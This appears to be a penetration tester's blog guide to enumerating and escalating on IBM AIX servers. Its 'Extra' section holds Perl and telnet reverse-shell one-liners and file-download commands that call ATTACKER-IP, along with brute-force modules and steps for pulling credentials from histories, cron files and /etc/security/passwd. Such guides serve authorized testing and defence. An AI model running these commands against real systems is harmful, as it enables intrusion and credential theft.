Background:

On a recent internal pentesting engagement I managed to get an unprivileged shell on one of my client’s servers. It was a business critical server so enumerating it and rooting it was the next logical move to make.

I always begin my enumeration by running the “uname -a” command to get some basic system information; funny thing though, this time around I had no idea what some of the output meant.

This was my first encounter with privilege escalation on AIX and I was pretty surprised by how little information I found online on enumerating AIX systems. Most of the post-exploitation guides/posts I read only mentioned where the user password hash file is stored (/etc/security/passwd) since it’s different from the regular location (/etc/shadow). But after I spent a little time aimlessly running commands that kept failing, I quickly realised that this wasn’t the only difference between AIX and other Unix systems.

It took me a little time going through various AIX system administration guides and command cheatsheets (links at the bottom of the post) and putting together a list of various post-exploitation techniques to use on the box. I decided to put this blog-post up with the hope that it will one day help another clueless pentester/red teamer.

AIX:

AIX (Advanced Interactive eXecutive) is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms. AIX is an enterprise-class OS so it tends to be preferred by large organisations like banks, governments, insurance companies, power stations and universities.

AIX’s default shell was the Bourne shell (/bin/sh) up to AIX version 3, but it was later changed to the Korn shell (/bin/ksh). The most recent version of AIX at the time of writing is AIX 7.2.

I should make it clear that the majority of basic Unix commands will work on AIX systems: navigation, directory listing, process listing, file manipulation, searching and grepping, etc. You’re not going to have to relearn Unix administration from scratch, but there are some tricks you may want to add to your arsenal if you want to adequately enumerate an AIX server.

AIX Enumeration:

There are already plenty of great Linux post-exploitation guides on the web (links at the bottom of the post), and a lot of the enumeration techniques in them will work on AIX. So I’m going to try as much as possible not to reinvent the wheel; there will be a little repetition of basic/familiar commands, but I’ll do my best to keep it to a minimum.

I like to split my system enumeration into 7 general sections, so this is what I’ll use to structure this post:

1. System Info
2. Users & Groups
3. Drives & Shares
4. Network Info
5. Process Info
6. Software/Packages
7. Config & Miscellaneous

UPDATE: I’ve created a GitHub repo with all the enumeration tips below. You can find the repo here:

https://github.com/V1V1/AIX-for-Penetration-Testers

1. System Info:

Command: prtconf
  Purpose: Prints system configuration.
  Comments: This will give you a significant amount of information about the system: architecture, processor and memory information, network information, storage information etc. This is probably the first command you should run on AIX systems since it will give you a lot of useful information about the server.

Command: uname -a
  Purpose: Prints the OS name, hostname, release number of the operating system, operating system version and machine ID.

Command: uname -x
  Purpose: Prints the information specified with the ‘-a’ flag as well as the LAN network number, as specified by the ‘-l’ flag.

Command: uname -M
  Purpose: Prints the system model.

Command: uname -u
  Purpose: Displays the system ID/serial number.

Command: oslevel -s
  Purpose: Prints AIX version information.
  Comments: Sample output:

    6100-07-05-1228

  The first four digits are the major release, e.g. AIX 6.1.
  The next two digits denote the TL (Technology Level), e.g. TL07.
  The third set of digits are the SP (Service Pack), e.g. SP05.
  The final four digits are the (US format) date of this release, e.g. 28th December.

Command: lscfg -p
  Purpose: Prints list of all installed resources.

Command: lsdev -C | sort -d
  Purpose: Prints list of all hardware attached to the server.

Command: lssrc -a
  Purpose: Prints list of all system resources on the server.
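As an added example (my own code, not from the original post or from IBM), here is a small Python helper that parses the `oslevel -s` format described above into its release, TL and SP fields and flags hosts that sit below a required patch baseline, the sort of check a blue team runs over oslevel output collected from a fleet. The hostnames and level strings are constructed; the trailing four-digit field is kept verbatim rather than interpreted.

```python
import re
from dataclasses import dataclass

# The four dash-separated fields of `oslevel -s`, e.g. 6100-07-05-1228.
OSLEVEL_RE = re.compile(r"^(\d{4})-(\d{2})-(\d{2})-(\d{4})$")


@dataclass(frozen=True)
class OsLevel:
    base: str    # "6100" -> AIX 6.1, "7200" -> AIX 7.2
    tl: int      # Technology Level
    sp: int      # Service Pack
    build: str   # trailing four-digit build stamp, kept verbatim

    def release(self) -> str:
        return f"{self.base[0]}.{self.base[1]}"

    def label(self) -> str:
        return f"AIX {self.release()} TL{self.tl:02d} SP{self.sp:02d}"

    def key(self):
        # Ordering used for comparisons: release, then TL, then SP.
        return (self.base, self.tl, self.sp)


def parse_oslevel(text: str) -> OsLevel:
    m = OSLEVEL_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised oslevel -s output: {text!r}")
    base, tl, sp, build = m.groups()
    return OsLevel(base, int(tl), int(sp), build)


def below_baseline(levels: dict, baseline: str) -> list:
    """Hostnames whose level is older than `baseline` (same format as oslevel -s)."""
    want = parse_oslevel(baseline).key()
    return [h for h, raw in sorted(levels.items()) if parse_oslevel(raw).key() < want]


# Constructed sample: oslevel -s output from three hypothetical hosts.
SAMPLE_LEVELS = {
    "aixdb01": "6100-07-05-1228",
    "aixapp02": "6100-07-03-1207",
    "aixweb03": "7200-01-02-1717",
}

if __name__ == "__main__":
    for host, raw in SAMPLE_LEVELS.items():
        print(host, parse_oslevel(raw).label())
    print("below 6.1 TL07 SP05:", below_baseline(SAMPLE_LEVELS, "6100-07-05-0000"))
```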

2. Users & Groups:

Command: id
  Purpose: Prints current user’s details and group information.

Command: who -a / w / last -a
  Purpose: Prints information about logged in users.

Command: cat /etc/passwd
  Purpose: Prints list of all users.

Command: lsuser ALL
  Purpose: Prints list of all users and their attributes.

Command: cat /etc/group
  Purpose: Prints list of all groups.

Command: lsgroup ALL
  Purpose: Prints list of all groups and their attributes (including members).

Command: cat /etc/security/passwd
  Purpose: Prints list of all users’ password hashes (requires root).
  Comments: AIX password hashes aren’t stored in a similar format to other Unix systems. More on this later.

AIX User Management:

If you manage to get access to an account with user management privileges, this section might come in handy:

Unix command: useradd
  AIX command: mkuser
  Purpose: Create a user.

Unix command: usermod
  AIX command: chuser
  Purpose: Modify a user.

Unix command: userdel
  AIX command: rmuser
  Purpose: Delete a user.

Unix command: usermod -s
  AIX command: chsh OR passwd -s
  Purpose: Change a user’s shell.

Unix command: passwd -l
  AIX command: chuser login=false
  Purpose: Lock a user’s account.

3. Drives & Shares:

Command: lspv
  Purpose: Prints list of disks on the server.
  Comments: Sample output:

    hdisk1 004ce4cf0ff6d5c6 rootvg active
    hdisk2 00c9b8fa3120beb9 datavg active

  In this example the system has 2 physical disks and they are assigned to 2 Volume Groups (rootvg and datavg). Every AIX system has a “rootvg” as this is where AIX is installed and the system is booted from.

Command: lspv hdisk0
  Purpose: Prints information about a specified hard disk.

Command: lsvg
  Purpose: Prints a list of all volume groups.
  Comments: A VG (Volume Group) is a local disk which can consist of one or more disks or LUNs (logical unit numbers). VGs enable files to be spread across multiple disks (aka Physical Volumes or PVs).

Command: lsvg -l rootvg
  Purpose: Prints information about a specified volume group.

Command: mount
  Purpose: Prints information about all mounted filesystems.

Command: df -k / df -h
  Purpose: Prints mounted filesystem information: disk usage, mount location etc.

Command: lsps -a
  Purpose: Prints paging space information.

Command: lslpp -L | grep nfs
  Purpose: Verifies if NFS is installed.

Command: lssrc -g nfs | grep active
  Purpose: Checks NFS/NIS status.

Command: cat /etc/xtab
  Purpose: Checks to see if it is an NFS server and what directories are exported.

Command: showmount
  Purpose: Shows hosts that export NFS directories.

Command: showmount -e
  Purpose: Shows what directories are exported.

4. Network Info:

Command: ifconfig -a
  Purpose: Prints information about the server’s network interfaces.

Command: lsdev -Cc if
  Purpose: Prints hardware information about the server’s network interfaces.

Command: netstat -i
  Purpose: Prints a table of all network interfaces.

Command: netstat -nr
  Purpose: Prints the server’s routing table.

Command: arp -a
  Purpose: Prints the server’s ARP table.

Command: namerslv -Is
  Purpose: Prints a list of all the nameservers the server has access to.

Command: hostent -S
  Purpose: Prints a list of all host entries on the server.

Command: grep 80 /etc/services
  Purpose: Prints information about a specified running service.

5. Process Info:

Command: ps aux
  Purpose: Prints running process information.

Command: who -p /var/adm/wtmp
  Purpose: Prints the processes from users logged into the server.

6. Software/Packages:

Command: echo $PATH
  Purpose: Prints the current user’s path/environment.

Command: whereis 'program'
  Purpose: Locates a specified program on the server.

Command: which 'program'
  Purpose: Locates a specified program on the server (will only search the current user’s path/environment).

Command: lslpp -L
  Purpose: Prints a list of the server’s software inventory.

Command: lslpp -h
  Purpose: Prints a list of the server’s software history.

Command: lslpp -L | grep 'program'
  Purpose: Searches the server’s software inventory for a specific program.

Command: rpm -qa
  Purpose: Prints a list of all installed rpm packages.

Command: rpm -qa | grep 'package'
  Purpose: Searches for a specific program in all installed rpm packages.

Command: ls -l /usr/bin
  Purpose: /usr/bin directory listing.

7. Config & Miscellaneous:

Before I get into this section, I’ll mention that there is no exhaustive guide to enumerating every server’s configuration, since this is completely dynamic and will vary based on the environment and the respective system’s purpose. The post-exploitation guides at the bottom of this post have a long list of techniques that will help you out in this phase. That said, I’ll summarise some general strategies that may come in handy.

Target: Configuration files
  Strategies: Like most Unix systems, AIX has a ‘/etc’ directory where you’re likely to find lots of configuration files, so take your time going through it.
  Search individual users’ home directories for configuration directories/files, e.g. the ‘.ssh’ folder.
  Also search additional/3rd party software directories and files. AIX is often used for sensitive applications such as core banking systems, and you may be fortunate enough to find gems like hard-coded database passwords in these files.
  Sample commands:
    ls -l /etc
    ls -lR /etc/ | grep "conf"
    ls -lR /path/to/somewhere/ | grep "config"

Target: User activity
  Strategies: Show me your shell history and I’ll show you who you are.
  A user’s history can often reveal a lot of sensitive information. I’ve often come across admins echoing passwords into commands to avoid inputting them in interactive prompts.
  Search home folders and other directories for scripts written by server admins; these can occasionally be gold mines.
  Sample commands:
    cat /home/USER/.sh_history
    cat /home/USER/.vi_history
    cat /home/USER/.profile
    grep ^sh /home/*/.*hist*
    grep ^ssh /home/*/.*hist*
    grep ^telnet /home/*/.*hist*
    ls -lR /path/to/somewhere/ | grep "\.sh"

Target: Cron jobs
  Strategies: Cron allows admins to schedule tasks to run at any hour of the day or night, making regular upkeep a breeze.
  Custom scripts specified in cron jobs can often contain sensitive information like passwords.
  Sample commands:
    crontab -l
    cat /var/spool/cron/crontabs/*
    cat /var/adm/cron/log
    cat /var/adm/cron/cron.deny
    cat /var/adm/cron/cron.allow

Target: Logs
  Strategies: Log files can occasionally contain sensitive information.
  AIX has various directories you should search for potentially sensitive log files.
  You can also use the ‘alog’ utility to view specific logs.
  AIX also comes with the ‘errpt’ utility, which you can use to generate error reports from entries in an error log. You can read more about its usage here.
  Sample commands:
    ls /var/log/
    ls /var/adm
    cat /var/log/messages
    cat /var/adm/messages
    cat /var/adm/ras/errlog
    alog -L            # List all available logs
    alog -o -t LOG     # View a specific log, e.g. to view the boot log: alog -o -t boot
    errpt | head       # View the most recent error log entries

Target: Archive files
  Strategies: Archive files are often used to back up data, and you may come across archive files which contain sensitive information (e.g. application passwords, configuration files, ssh keys and databases).
  Use find to discover archive files (e.g. .tar, .gz, .a).
  AIX libraries with the “.a” extension are ‘ar’ archive files. ar is the archiving utility that creates them, and it is installed by default on AIX.
  Sample commands:
    ls -lR /path/to/somewhere/ | grep "\.tar"
    ls -lR /path/to/somewhere/ | grep "\.gz"
    ls -lR /path/to/somewhere/ | grep "\.a"

Target: “Interesting” files
  Strategies: Again, this varies significantly depending on the server’s purpose.
  The ‘find’ command works on AIX, so the options here are limitless.
  Some general strategies:
    Review all SUID/SGID/SETUID/SETGID files.
    Search and grep for files with interesting strings, e.g. password.
    Search the ‘/tmp’ directory.
  Sample commands:
    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -1000 -print 2>/dev/null
    find / -perm -2000 -print 2>/dev/null
    find / -perm -3000 -print 2>/dev/null
    grep -rnw /path/to/somewhere/ -e "password"
    ls -la /tmp

Extra:

This section was a bit of an afterthought but I decided to throw it in anyway. It’s basically a few techniques involving default AIX packages/services that you may find useful at various stages of your assessment.

1. Exploitation – getting your initial foothold:

The attack vectors available to you will completely depend on the server’s configuration and running services. You MAY find some of the services listed below running on AIX servers.

Port: 21
  Service: FTP
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/ftp/ftp_login

Port: 22
  Service: SSH
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/ssh/ssh_login

Port: 23
  Service: Telnet
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/telnet/telnet_login

Port: 512
  Service: rexec
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/rservices/rexec_login

Port: 513
  Service: rlogin
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/rservices/rlogin_login

Port: 80, 443 and countless others; this will vary depending on what additional software is installed on the server.
  Service: Web
  Attack vector: Default passwords, brute force, shell uploads (WAR, jsp) etc.

2. Reverse shells:

So you have command execution and want to level up and get a reverse shell? Setup a listener and try a few of the commands below.



Software/Package: Perl
  Command: /usr/bin/perl -e 'use Socket;$i="ATTACKER-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Software/Package: Telnet
  Command: telnet ATTACKER-IP 80 | /bin/sh | telnet ATTACKER-IP 44445

Software/Package: Telnet
  Command: telnet ATTACKER-IP 80 | /bin/sh | telnet ATTACKER-IP 443



NOTE: Remember to listen on both port 80 & 443.

3. TTY shells:

As is often the case, you may have found yourself in a restricted non-tty shell that limits your options when interacting with the server. Here are some tty shell spawns to try out.

Software/Package: /bin/sh
  Command: /bin/sh -i

Software/Package: Perl
  Command: perl -e 'exec "/bin/sh";'

Software/Package: Perl (from an interactive perl session)
  Command: exec "/bin/sh";

4. File downloads:

At some point during your post-exploitation, you’re probably going to want to download a file like a privilege escalation exploit onto the server. Default AIX installations are missing a lot of the basic utilities you’re likely to come across on other Unix systems. The server I was on didn’t have wget, curl or nc installed. Admins may install some of them as additional utilities, but it’s safer to assume you won’t find any of them on the box.

Fortunately, there are some default programs installed on AIX that can aid you with file downloads.

Software/Package: FTP
  Command:
    ftp ATTACKER-IP
    (input username & password)
    get FILE
    exit

Software/Package: SCP
  Command: scp ATTACKER-USER@ATTACKER-IP:/path/to/remote/FILE /path/to/local/FILE

Software/Package: Telnet
  Command: (echo 'GET /FILE'; echo ""; sleep 1; ) | telnet ATTACKER-IP 80 > FILE
  NOTE: This command will also record some unnecessary telnet command output at the top of the downloaded file, which could affect execution if it’s a shell script. You can use tail to strip this unnecessary output:
    tail -n +6 FILE > FILE2

Software/Package: Perl
  Command: echo '#!/usr/bin/perl' > downloader.pl && echo 'use LWP::Simple; getstore("http://ATTACKER-IP:80/FILE", "FILE");' >> downloader.pl && perl downloader.pl

Software/Package: Perl
  Command: lwp-download http://ATTACKER-IP/FILE
  NOTE: lwp-download usually comes packaged with Perl.

5. Privilege Escalation:

IBM is quite proud of AIX’s security reputation, and with good reason: there aren’t a lot of exploits out there for their product. The good news is that Offensive Security’s Exploit Database does have a number of privilege escalation exploits for various versions of AIX that you may find useful.

6. Cracking AIX passwords:

AIX’s user password hashes are stored in the ‘/etc/security/passwd’ file. I mentioned earlier that these hashes aren’t stored in a format similar to other Unix systems. Hashcat does have support for the various hashing mechanisms used by AIX systems; you can find some example hashes here (search for AIX).



I also found a Metasploit module that uses John the Ripper to identify weak passwords acquired from AIX systems, but I haven’t tried this out yet. I’ll be sure to update this post when I do.
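As an added example (my own code, not from the post or from IBM), here is a small Python audit of the stanza layout used by /etc/security/passwd, the defender's side of the point above: it flags accounts whose hashes are still in the legacy 13-character crypt form or are empty, and accounts carrying the NOCHECK flag. The stanza layout and the {ssha256}/crypt conventions come from my own knowledge of AIX rather than from the post; the stanzas below are constructed for hypothetical users and the hash bodies are dummy values.

```python
import re

# Constructed sample of /etc/security/passwd stanzas (hypothetical users, dummy hash bodies).
SAMPLE_SECURITY_PASSWD = """\
root:
        password = {ssha256}06$AAAAAAAAAAAAAAAA$BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
        flags = ADMCHG
appuser:
        password = abJnggxhB/yWI
        flags = NOCHECK
guest:
        password = *
svc:
        password =
"""

STANZA_RE = re.compile(r"^(\S+):\s*$")               # "user:" opens a stanza
ATTR_RE = re.compile(r"^\s+(\w+)\s*=\s*(.*?)\s*$")   # indented "attribute = value"
WEAK_KINDS = {"crypt", "smd5", "empty", "missing", "unknown"}


def parse_stanzas(text):
    """Parse AIX stanza-format text into {user: {attribute: value}}."""
    users, current = {}, None
    for line in text.splitlines():
        m = STANZA_RE.match(line)
        if m:
            current = users.setdefault(m.group(1), {})
            continue
        m = ATTR_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return users


def classify_hash(value):
    """Name the hash scheme of a password field ('*' means a locked account)."""
    if value in (None, "", "*"):
        return {None: "missing", "": "empty", "*": "locked"}[value]
    m = re.match(r"^\{(\w+)\}", value)   # loadable algorithm tag, e.g. {ssha256}, {smd5}
    return m.group(1).lower() if m else ("crypt" if len(value) == 13 else "unknown")


def audit(text):
    """(user, reason) pairs a hardening review should look at first."""
    findings = []
    for user, attrs in parse_stanzas(text).items():
        kind = classify_hash(attrs.get("password"))
        if kind in WEAK_KINDS:
            findings.append((user, f"password hash type: {kind}"))
        if "NOCHECK" in attrs.get("flags", ""):
            findings.append((user, "flags=NOCHECK: password restrictions not enforced"))
    return findings
```

Run `audit(open("/etc/security/passwd").read())` as root on a real host to get the same list for that system.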

Summary:

Like I said at the beginning, I wrote this post because I was desperately looking for something like it when I was starting my AIX post-exploitation. It’s not a comprehensive guide to AIX/Unix enumeration, but with any luck it may come to the aid of another despairing internet adventurer in the future. If it helps just one person, then it’s served its purpose. Happy hunting.

References:

I went through some incredibly informative material that helped me out both during my engagement (yes, I did root the server 🙂 ) and the writing of this post.

1. Linux Post Exploitation:

2. AIX Sysadmin Guides & Cheatsheets:

3. Breaking AIX:

4. Securing AIX – because I love blue teamers 😉